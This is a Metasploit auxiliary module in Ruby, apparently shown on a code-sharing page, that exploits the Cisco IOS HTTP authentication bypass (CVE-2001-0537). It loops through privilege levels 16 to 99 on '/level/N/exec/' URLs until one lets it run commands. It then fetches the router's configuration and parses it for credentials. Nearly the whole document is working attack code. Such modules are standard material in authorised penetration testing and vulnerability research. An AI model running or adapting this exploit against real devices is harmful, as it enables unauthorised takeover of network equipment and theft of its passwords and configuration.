Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6

7

8
class MetasploitModule < Msf::Auxiliary
9

10
  # Exploit mixins should be called first
11
  include Msf::Exploit::Remote::HttpClient
12

13
  # Include Cisco utility methods
14
  include Msf::Auxiliary::Cisco
15

16
  # Scanner mixin should be near last
17
  include Msf::Auxiliary::Scanner
18

19
  def initialize(info={})
20
    super(update_info(info,
21
      'Name'           => 'Cisco IOS HTTP Unauthorized Administrative Access',
22
      'Description'    => %q{
23
        This module exploits a vulnerability in the Cisco IOS HTTP Server.
24
        By sending a GET request for "/level/num/exec/..", where num is between
25
        16 and 99, it is possible to bypass authentication and obtain full system
26
        control. IOS 11.3 -> 12.2 are reportedly vulnerable. This module
27
        tested successfully against a Cisco 1600 Router IOS v11.3(11d).
28
      },
29
      'Author'		=> [ 'aushack', 'hdm' ],
30
      'License'		=> MSF_LICENSE,
31
      'References'	=>
32
        [
33
          [ 'BID', '2936'],
34
          [ 'CVE', '2001-0537'],
35
          [ 'OSVDB', '578' ],
36
        ],
37
      'DisclosureDate' => '2001-06-27'))
38
  end
39

40
  def run_host(ip)
41

42
    16.upto(99) do |level|
43
      res = send_request_cgi({
44
        'uri'  		=>  "/level/#{level}/exec/show/version/CR",
45
        'method'   	=> 'GET'
46
      }, 20)
47

48
      if res and res.body and res.body =~ /Cisco Internetwork Operating System Software/
49
        print_good("#{rhost}:#{rport} Found vulnerable privilege level: #{level}")
50

51
        report_vuln(
52
          {
53
            :host	=> rhost,
54
            :port	=> rport,
55
            :proto  => 'tcp',
56
            :name	=> self.name,
57
            :sname  => ssl ? "https" : "http",
58
            :info	=> "Module #{self.fullname} successfully accessed http://#{rhost}:#{rport}/level/#{level}/exec/show/version/CR",
59
            :refs   => self.references,
60
            :exploited_at => Time.now.utc
61
          }
62
        )
63

64
        res = send_request_cgi({
65
          'uri'  		=>  "/level/#{level}/exec/show/config/CR",
66
          'method'   	=> 'GET'
67
        }, 20)
68

69
        if res and res.body and res.body =~ /<FORM METHOD([^\>]+)\>(.*)<\/FORM>/mi
70
          config = $2.strip
71
          print_good("#{rhost}:#{rport} Processing the configuration file...")
72
          cisco_ios_config_eater(rhost, rport, config)
73
          report_exploit(
74
            {
75
              :host		=> rhost,
76
              :port		=> rport,
77
              :name		=> self.name,
78
              :sname      => ssl ? "https" : "http",
79
              :info       => "Module #{self.fullname} successfully captured the configuration file:\n#{config}"
80
            }
81
          )
82
        else
83
          print_error("#{rhost}:#{rport} Error: could not retrieve the IOS configuration")
84
        end
85

86
        break
87
      end
88
    end
89
  end
90
end
91

92